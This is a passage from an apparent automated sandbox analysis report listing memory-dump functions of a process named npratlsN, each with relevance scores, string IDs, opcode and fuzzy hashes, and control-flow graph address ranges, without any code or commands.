                                                                                                                                                                          • Source File: 00000008.00000002.3086764521.000000002B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B7C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2b7c0000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                                                                                          • API String ID: 0-1487592376
                                                                                                                                                                          • Opcode ID: e4cdaf6e58e357b7d3aac96e97ee2005f63890b151fb822da7e41ea387d069e2
                                                                                                                                                                          • Instruction ID: 7e04e2217b60b2be6fcd5d80c7fe5166b1ed90c5d08877278cd161038268d659
                                                                                                                                                                          • Opcode Fuzzy Hash: e4cdaf6e58e357b7d3aac96e97ee2005f63890b151fb822da7e41ea387d069e2
                                                                                                                                                                          • Instruction Fuzzy Hash: 1A81B474E00258CFDB14DFAAD994A9EBBF2BF88310F14D069E809AB365DB349941CF10
                                                                                                                                                                          Function 2B7CB7A2 Relevance: 6.4, Strings: 5, Instructions: 190COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 1643 2b7cb7a2-2b7cb7df 1645 2b7cb7e6-2b7cb8c3 call 2b7c3400 call 2b7c2f20 1643->1645 1646 2b7cb7e1 1643->1646 1656 2b7cb8ca-2b7cb8eb call 2b7c44d0 1645->1656 1657 2b7cb8c5 1645->1657 1646->1645 1659 2b7cb8f0-2b7cb8fb 1656->1659 1657->1656 1660 2b7cb8fd 1659->1660 1661 2b7cb902-2b7cb906 1659->1661 1660->1661 1662 2b7cb908-2b7cb909 1661->1662 1663 2b7cb90b-2b7cb912 1661->1663 1664 2b7cb92a-2b7cb96e 1662->1664 1665 2b7cb919-2b7cb927 1663->1665 1666 2b7cb914 1663->1666 1670 2b7cb9d4-2b7cb9eb 1664->1670 1665->1664 1666->1665 1672 2b7cb9ed-2b7cba12 1670->1672 1673 2b7cb970-2b7cb986 1670->1673 1682 2b7cba2a 1672->1682 1683 2b7cba14-2b7cba29 1672->1683 1677 2b7cb988-2b7cb994 1673->1677 1678 2b7cb9b0 1673->1678 1679 2b7cb99e-2b7cb9a4 1677->1679 1680 2b7cb996-2b7cb99c 1677->1680 1681 2b7cb9b6-2b7cb9d3 1678->1681 1684 2b7cb9ae 1679->1684 1680->1684 1681->1670 1683->1682 1684->1681
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3086764521.000000002B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B7C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2b7c0000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                                                                                          • API String ID: 0-1487592376
                                                                                                                                                                          • Opcode ID: a5006900a104f9d172506f792600c26b203fae7b7dc1da87cbd7b227a4dec374
                                                                                                                                                                          • Instruction ID: b3bad9ed4face5dbb21981df9b837e00489b6423abfdd98b430bfb928e7924af
                                                                                                                                                                          • Opcode Fuzzy Hash: a5006900a104f9d172506f792600c26b203fae7b7dc1da87cbd7b227a4dec374
                                                                                                                                                                          • Instruction Fuzzy Hash: B681B574E01218CFDB14DFAAD994A9EBBF2BF88300F14C069E849AB365DB349945CF50
                                                                                                                                                                          Function 2B7CAF00 Relevance: 6.4, Strings: 5, Instructions: 189COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 1688 2b7caf00-2b7caf3f 1690 2b7caf46-2b7cb023 call 2b7c3400 call 2b7c2f20 1688->1690 1691 2b7caf41 1688->1691 1701 2b7cb02a-2b7cb04b call 2b7c44d0 1690->1701 1702 2b7cb025 1690->1702 1691->1690 1704 2b7cb050-2b7cb05b 1701->1704 1702->1701 1705 2b7cb05d 1704->1705 1706 2b7cb062-2b7cb066 1704->1706 1705->1706 1707 2b7cb068-2b7cb069 1706->1707 1708 2b7cb06b-2b7cb072 1706->1708 1709 2b7cb08a-2b7cb0ce 1707->1709 1710 2b7cb079-2b7cb087 1708->1710 1711 2b7cb074 1708->1711 1715 2b7cb134-2b7cb14b 1709->1715 1710->1709 1711->1710 1717 2b7cb14d-2b7cb172 1715->1717 1718 2b7cb0d0-2b7cb0e6 1715->1718 1724 2b7cb18a 1717->1724 1725 2b7cb174-2b7cb189 1717->1725 1722 2b7cb0e8-2b7cb0f4 1718->1722 1723 2b7cb110 1718->1723 1726 2b7cb0fe-2b7cb104 1722->1726 1727 2b7cb0f6-2b7cb0fc 1722->1727 1728 2b7cb116-2b7cb133 1723->1728 1725->1724 1729 2b7cb10e 1726->1729 1727->1729 1728->1715 1729->1728
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3086764521.000000002B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B7C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2b7c0000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                                                                                          • API String ID: 0-1487592376
                                                                                                                                                                          • Opcode ID: 2e908455d368d5d5434e90e2b2baa6b099b9da22913e3eab6ae735ce3c235d20
                                                                                                                                                                          • Instruction ID: 083ccfd13de712349e65438e2c6bfb38d359048ec47ead857cd9b05cfa8c1c09
                                                                                                                                                                          • Opcode Fuzzy Hash: 2e908455d368d5d5434e90e2b2baa6b099b9da22913e3eab6ae735ce3c235d20
                                                                                                                                                                          • Instruction Fuzzy Hash: 7681A674E00258CFDB54CFA9D994A9EBBF2BF88300F14D069E418AB365DB349985CF50
                                                                                                                                                                          Function 2B7CBD5F Relevance: 6.4, Strings: 5, Instructions: 189COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 1733 2b7cbd5f-2b7cbd9f 1735 2b7cbda6-2b7cbe83 call 2b7c3400 call 2b7c2f20 1733->1735 1736 2b7cbda1 1733->1736 1746 2b7cbe8a-2b7cbeab call 2b7c44d0 1735->1746 1747 2b7cbe85 1735->1747 1736->1735 1749 2b7cbeb0-2b7cbebb 1746->1749 1747->1746 1750 2b7cbebd 1749->1750 1751 2b7cbec2-2b7cbec6 1749->1751 1750->1751 1752 2b7cbec8-2b7cbec9 1751->1752 1753 2b7cbecb-2b7cbed2 1751->1753 1754 2b7cbeea-2b7cbf2e 1752->1754 1755 2b7cbed9-2b7cbee7 1753->1755 1756 2b7cbed4 1753->1756 1760 2b7cbf94-2b7cbfab 1754->1760 1755->1754 1756->1755 1762 2b7cbfad-2b7cbfd2 1760->1762 1763 2b7cbf30-2b7cbf46 1760->1763 1769 2b7cbfea 1762->1769 1770 2b7cbfd4-2b7cbfe9 1762->1770 1767 2b7cbf48-2b7cbf54 1763->1767 1768 2b7cbf70 1763->1768 1771 2b7cbf5e-2b7cbf64 1767->1771 1772 2b7cbf56-2b7cbf5c 1767->1772 1773 2b7cbf76-2b7cbf93 1768->1773 1770->1769 1774 2b7cbf6e 1771->1774 1772->1774 1773->1760 1774->1773
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3086764521.000000002B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B7C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2b7c0000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                                                                                          • API String ID: 0-1487592376
                                                                                                                                                                          • Opcode ID: 670bd8960b14c16ab28a33c4ba315df67dc1091d509e8edcf6a66aeb754d1d4b
                                                                                                                                                                          • Instruction ID: 8081d7f791ac4625ee6e401b17f16b1a164c6865c4be6d3e1cacd8eebb89b494
                                                                                                                                                                          • Opcode Fuzzy Hash: 670bd8960b14c16ab28a33c4ba315df67dc1091d509e8edcf6a66aeb754d1d4b
                                                                                                                                                                          • Instruction Fuzzy Hash: FB819474E01258CFDB14DFA9D994A9EBBF2BF88300F14C069E819AB365DB349985CF50
                                                                                                                                                                          Function 2B7CBA81 Relevance: 6.4, Strings: 5, Instructions: 188COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3086764521.000000002B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B7C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2b7c0000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                                                                                          • API String ID: 0-1487592376
                                                                                                                                                                          • Opcode ID: 082f43cfcf42e9470d90dd104716f4fa0167a56877cc3e09a59be871df9216a8
                                                                                                                                                                          • Instruction ID: 8f3a04cb4bb383d8cca7d19d60aec62bbeb6eadd9b157455626b2897926d4e6a
                                                                                                                                                                          • Opcode Fuzzy Hash: 082f43cfcf42e9470d90dd104716f4fa0167a56877cc3e09a59be871df9216a8
                                                                                                                                                                          • Instruction Fuzzy Hash: 3A819674E01258CFDB14DFAAD994A9EBBF2BF88300F14C069E819AB365DB349945CF50
                                                                                                                                                                          Function 2B7CB1E1 Relevance: 6.4, Strings: 5, Instructions: 188COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 1778 2b7cb1e1-2b7cb21f 1780 2b7cb226-2b7cb303 call 2b7c3400 call 2b7c2f20 1778->1780 1781 2b7cb221 1778->1781 1791 2b7cb30a-2b7cb32b call 2b7c44d0 1780->1791 1792 2b7cb305 1780->1792 1781->1780 1794 2b7cb330-2b7cb33b 1791->1794 1792->1791 1795 2b7cb33d 1794->1795 1796 2b7cb342-2b7cb346 1794->1796 1795->1796 1797 2b7cb348-2b7cb349 1796->1797 1798 2b7cb34b-2b7cb352 1796->1798 1799 2b7cb36a-2b7cb3ae 1797->1799 1800 2b7cb359-2b7cb367 1798->1800 1801 2b7cb354 1798->1801 1805 2b7cb414-2b7cb42b 1799->1805 1800->1799 1801->1800 1807 2b7cb42d-2b7cb452 1805->1807 1808 2b7cb3b0-2b7cb3c6 1805->1808 1814 2b7cb46a 1807->1814 1815 2b7cb454-2b7cb469 1807->1815 1812 2b7cb3c8-2b7cb3d4 1808->1812 1813 2b7cb3f0 1808->1813 1816 2b7cb3de-2b7cb3e4 1812->1816 1817 2b7cb3d6-2b7cb3dc 1812->1817 1818 2b7cb3f6-2b7cb413 1813->1818 1815->1814 1819 2b7cb3ee 1816->1819 1817->1819 1818->1805 1819->1818
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3086764521.000000002B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B7C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2b7c0000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                                                                                          • API String ID: 0-1487592376
                                                                                                                                                                          • Opcode ID: 154143d0e0a3446eba7e2a93b0f9c7f8fedf0f9fbbb971e4aed5f7cdd7e5dffe
                                                                                                                                                                          • Instruction ID: 31819c229d11bebad8617164af027150ae1d3c8495a19b2279579ab529a5c404
                                                                                                                                                                          • Opcode Fuzzy Hash: 154143d0e0a3446eba7e2a93b0f9c7f8fedf0f9fbbb971e4aed5f7cdd7e5dffe
                                                                                                                                                                          • Instruction Fuzzy Hash: 53817274E00258CFDB14DFAAD994A9EBBF2FF88310F148069E819AB365DB349945CF50
                                                                                                                                                                          Function 2B7CB4BF Relevance: 6.4, Strings: 5, Instructions: 188COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 1823 2b7cb4bf-2b7cb4ff 1825 2b7cb506-2b7cb5e3 call 2b7c3400 call 2b7c2f20 1823->1825 1826 2b7cb501 1823->1826 1836 2b7cb5ea-2b7cb60b call 2b7c44d0 1825->1836 1837 2b7cb5e5 1825->1837 1826->1825 1839 2b7cb610-2b7cb61b 1836->1839 1837->1836 1840 2b7cb61d 1839->1840 1841 2b7cb622-2b7cb626 1839->1841 1840->1841 1842 2b7cb628-2b7cb629 1841->1842 1843 2b7cb62b-2b7cb632 1841->1843 1844 2b7cb64a-2b7cb68e 1842->1844 1845 2b7cb639-2b7cb647 1843->1845 1846 2b7cb634 1843->1846 1850 2b7cb6f4-2b7cb70b 1844->1850 1845->1844 1846->1845 1852 2b7cb70d-2b7cb732 1850->1852 1853 2b7cb690-2b7cb6a6 1850->1853 1859 2b7cb74a 1852->1859 1860 2b7cb734-2b7cb749 1852->1860 1857 2b7cb6a8-2b7cb6b4 1853->1857 1858 2b7cb6d0 1853->1858 1861 2b7cb6be-2b7cb6c4 1857->1861 1862 2b7cb6b6-2b7cb6bc 1857->1862 1863 2b7cb6d6-2b7cb6f3 1858->1863 1860->1859 1864 2b7cb6ce 1861->1864 1862->1864 1863->1850 1864->1863
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3086764521.000000002B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B7C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2b7c0000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                                                                                          • API String ID: 0-1487592376
                                                                                                                                                                          • Opcode ID: 05f2b7591513be7739a557cbf2bbf33c9927552ba71d71e1a18c5f2f6fefc499
                                                                                                                                                                          • Instruction ID: dac904d62d06a75dd44a8f7299223c36ac48fd74059f2eb57beee7448837c10d
                                                                                                                                                                          • Opcode Fuzzy Hash: 05f2b7591513be7739a557cbf2bbf33c9927552ba71d71e1a18c5f2f6fefc499
                                                                                                                                                                          • Instruction Fuzzy Hash: 4A819474E00218CFDB14DFAAD994A9EBBF2BF88300F14D069E819AB365DB349945CF50
                                                                                                                                                                          Function 2B7C5FA8 Relevance: 5.3, Strings: 4, Instructions: 333COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3086764521.000000002B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B7C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2b7c0000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: (o^q$(o^q$,bq$,bq
                                                                                                                                                                          • API String ID: 0-879173519
                                                                                                                                                                          • Opcode ID: 6d9307541deecc6ae2be0de7b844733b09ee114d667f3a4c1a2d5c3866c75173
                                                                                                                                                                          • Instruction ID: 7fc00f267eb338c8d65c3fbebe489a797171dac66f8fc85b2f82fcf13ed78661
                                                                                                                                                                          • Opcode Fuzzy Hash: 6d9307541deecc6ae2be0de7b844733b09ee114d667f3a4c1a2d5c3866c75173
                                                                                                                                                                          • Instruction Fuzzy Hash: C4D11670A00219DFCF04CFA9C9C4A9EBBF2BF89341F258469F905AB261E731E941CB50
                                                                                                                                                                          Function 2B7CAC20 Relevance: 3.9, Strings: 3, Instructions: 155COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3086764521.000000002B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B7C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2b7c0000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 0oAp$PH^q$PH^q
                                                                                                                                                                          • API String ID: 0-4194141968
                                                                                                                                                                          • Opcode ID: 2ab293c0a92aa9feb658698f1db03977915ee047d4315e9675d617e867458fdd
                                                                                                                                                                          • Instruction ID: 2028481c007712afb25f22714944f8e279518d2a8be8b9674b44df596cd2f287
                                                                                                                                                                          • Opcode Fuzzy Hash: 2ab293c0a92aa9feb658698f1db03977915ee047d4315e9675d617e867458fdd
                                                                                                                                                                          • Instruction Fuzzy Hash: 8661C774E00258CFDB14CFAAD994A9EBBF2BF88301F14C069E818AB369DB345945CF50
                                                                                                                                                                          Function 2B7C8F18 Relevance: 3.4, Strings: 2, Instructions: 910COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3086764521.000000002B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B7C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2b7c0000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: (o^q$4'^q
                                                                                                                                                                          • API String ID: 0-273632683
                                                                                                                                                                          • Opcode ID: fc641cf85067f1d3f9c68f88dbe164a4ec7e8930aa1a030e690749fa6e55d451
                                                                                                                                                                          • Instruction ID: cf8b4c1539c0c6deb8fc920b7594066a313b60182639f996bc093e486ccdc39e
                                                                                                                                                                          • Opcode Fuzzy Hash: fc641cf85067f1d3f9c68f88dbe164a4ec7e8930aa1a030e690749fa6e55d451
                                                                                                                                                                          • Instruction Fuzzy Hash: CE825975A00209DFCF42CF68C984A9EBBF2FF88300F158559E656EB2A2D734E951CB50
                                                                                                                                                                          Function 2B7C3068 Relevance: 2.9, Strings: 2, Instructions: 431COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3086764521.000000002B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B7C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2b7c0000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: Xbq$$^q
                                                                                                                                                                          • API String ID: 0-1593437937
                                                                                                                                                                          • Opcode ID: 1c280e0895c57526a889a92444666e8347b6999b06061f30e0254d3e3441886a
                                                                                                                                                                          • Instruction ID: c2e6dafb1911c98fb7c5b32e00f24d16e1aa60c7ab6dba475145410ba751e05d
                                                                                                                                                                          • Opcode Fuzzy Hash: 1c280e0895c57526a889a92444666e8347b6999b06061f30e0254d3e3441886a
                                                                                                                                                                          • Instruction Fuzzy Hash: E4F15F74E00258CFCB08DFB9D454AAEBBB2BFC8710B158469E805EB359CF399802CB55
                                                                                                                                                                          Function 2C896C18 Relevance: 2.7, Strings: 2, Instructions: 182COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3089514926.000000002C890000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C890000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c890000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: PH^q$PH^q
                                                                                                                                                                          • API String ID: 0-1598597984
                                                                                                                                                                          • Opcode ID: 6491401ed2d071381a7f98826265e870c1caeef3b45d7e76aab40385f8f33639
                                                                                                                                                                          • Instruction ID: 602c73d759c9793c3f19780f36009d9f799aa5c5035feaf101eda151bcba635e
                                                                                                                                                                          • Opcode Fuzzy Hash: 6491401ed2d071381a7f98826265e870c1caeef3b45d7e76aab40385f8f33639
                                                                                                                                                                          • Instruction Fuzzy Hash: F881DE74E04258CFDB58CFAAC994B9DBBF2BF89300F20806AD419AB394DB355945CF50
                                                                                                                                                                          Function 2C95CA90 Relevance: 2.0, Strings: 1, Instructions: 745COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3090164707.000000002C950000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C950000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c950000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 8`{+
                                                                                                                                                                          • API String ID: 0-1014734095
                                                                                                                                                                          • Opcode ID: b81bb3130af10d39e660bdbd7f387d0109bc5c9f9105d6b42ccd4cd5d89c572f
                                                                                                                                                                          • Instruction ID: 716287b35346fa6c4414f246a60f527a1ab5b32ef1eebe94e7c561ac5265bebb
                                                                                                                                                                          • Opcode Fuzzy Hash: b81bb3130af10d39e660bdbd7f387d0109bc5c9f9105d6b42ccd4cd5d89c572f
                                                                                                                                                                          • Instruction Fuzzy Hash: B7827E74E012688FDB64DF69C994BDDBBB2BF89300F1081EA940DA7265DB359E85CF40
                                                                                                                                                                          Function 2C887A28 Relevance: 1.9, APIs: 1, Instructions: 357COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3089414791.000000002C880000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C880000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c880000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 82a20aea2c2f4c0366f58cee7ccaf2bfc6322855e06f9549e12c239decba8856
                                                                                                                                                                          • Instruction ID: 61bcbce4b477149ee01d334a3803a894320871aa076875335c280889e8aebea3
                                                                                                                                                                          • Opcode Fuzzy Hash: 82a20aea2c2f4c0366f58cee7ccaf2bfc6322855e06f9549e12c239decba8856
                                                                                                                                                                          • Instruction Fuzzy Hash: 44F1D674D01218CFDB14DFA9D984B9DBBB2BF88304F10D6A9E408AB355DB74A985CF50
                                                                                                                                                                          Function 2D02C011 Relevance: 1.8, APIs: 1, Instructions: 329COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3091360143.000000002D020000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D020000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2d020000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 7f272ccc752a3524d481baff9d4e575853c6a4e724fd0ed96b080b516115b7b0
                                                                                                                                                                          • Instruction ID: 76dd717b1debab69228c9f48a73e3586860a70b43111ba1b2b26ed804c2ec926
                                                                                                                                                                          • Opcode Fuzzy Hash: 7f272ccc752a3524d481baff9d4e575853c6a4e724fd0ed96b080b516115b7b0
                                                                                                                                                                          • Instruction Fuzzy Hash: 16D14C30A01609CFEB04CFA5CD88BADBBF1BF94304F158569E509AB2B5DB74D945CB84
                                                                                                                                                                          Function 2C8965C0 Relevance: 1.5, Strings: 1, Instructions: 296COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3089514926.000000002C890000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C890000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c890000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 8`{+
                                                                                                                                                                          • API String ID: 0-1014734095
                                                                                                                                                                          • Opcode ID: 071fdce8454ac360846cefe284e247a8097dc1f6c3d30c5b51ca7cfc8ac4ca92
                                                                                                                                                                          • Instruction ID: e5b3821495efb87c7c3d50b11ba207ca281265584c14d1fcc3a952af2d13984f
                                                                                                                                                                          • Opcode Fuzzy Hash: 071fdce8454ac360846cefe284e247a8097dc1f6c3d30c5b51ca7cfc8ac4ca92
                                                                                                                                                                          • Instruction Fuzzy Hash: 02E1A174E01218CFEB54DFA5C994B9DBBB2BF89304F2081A9D408BB395DB355A85CF50
                                                                                                                                                                          Function 2C905438 Relevance: 1.5, Strings: 1, Instructions: 292COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3089726295.000000002C900000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C900000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c900000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 8`{+
                                                                                                                                                                          • API String ID: 0-1014734095
                                                                                                                                                                          • Opcode ID: 9e58fe389652b158d153f807a7ac37dd7724a7b14436af1953327194a87ada08
                                                                                                                                                                          • Instruction ID: db5afbb8a3ef993ea363831d4a17f9fa0661682253fc6abe2904c079d8818463
                                                                                                                                                                          • Opcode Fuzzy Hash: 9e58fe389652b158d153f807a7ac37dd7724a7b14436af1953327194a87ada08
                                                                                                                                                                          • Instruction Fuzzy Hash: A6D19174E01218CFDB54DFA9C994B9DBBB2BF89300F6081A9D409AB394DB359E85CF50
                                                                                                                                                                          Function 2C940E98 Relevance: 1.5, Strings: 1, Instructions: 292COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3090073724.000000002C940000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C940000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c940000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 8`{+
                                                                                                                                                                          • API String ID: 0-1014734095
                                                                                                                                                                          • Opcode ID: 5c195b1c98df45348e28763f0ad27481e4b0584e20379050833536e3d0300ffe
                                                                                                                                                                          • Instruction ID: ab6b00c46a87825db92dc291f60ce3c775d5d3d4ce16a7c4019d7e41e8858d52
                                                                                                                                                                          • Opcode Fuzzy Hash: 5c195b1c98df45348e28763f0ad27481e4b0584e20379050833536e3d0300ffe
                                                                                                                                                                          • Instruction Fuzzy Hash: 68D19F74E01218CFDB54DFA9C994B9DBBB2BF89300F6081A9D409AB394DB359E85CF50
                                                                                                                                                                          Function 2C897AF0 Relevance: 1.5, Strings: 1, Instructions: 272COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3089514926.000000002C890000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C890000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c890000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 8`{+
                                                                                                                                                                          • API String ID: 0-1014734095
                                                                                                                                                                          • Opcode ID: cdf4e3696b6a19497483c36e6bc43641ae01d2971d60ce49a77842c19b9782a0
                                                                                                                                                                          • Instruction ID: d0e082f7fe16b5e912667011d23adf4428583313d775b6a223785b92e2b4606b
                                                                                                                                                                          • Opcode Fuzzy Hash: cdf4e3696b6a19497483c36e6bc43641ae01d2971d60ce49a77842c19b9782a0
                                                                                                                                                                          • Instruction Fuzzy Hash: 6DD1A074E00218CFDB54DFA9C990B9DBBB2BF89300F1085A9D909AB3A4DB359D85CF51
                                                                                                                                                                          Function 2C89B980 Relevance: 1.5, Strings: 1, Instructions: 272COMMON
                                                                                                                                                                          Download Yara Rule
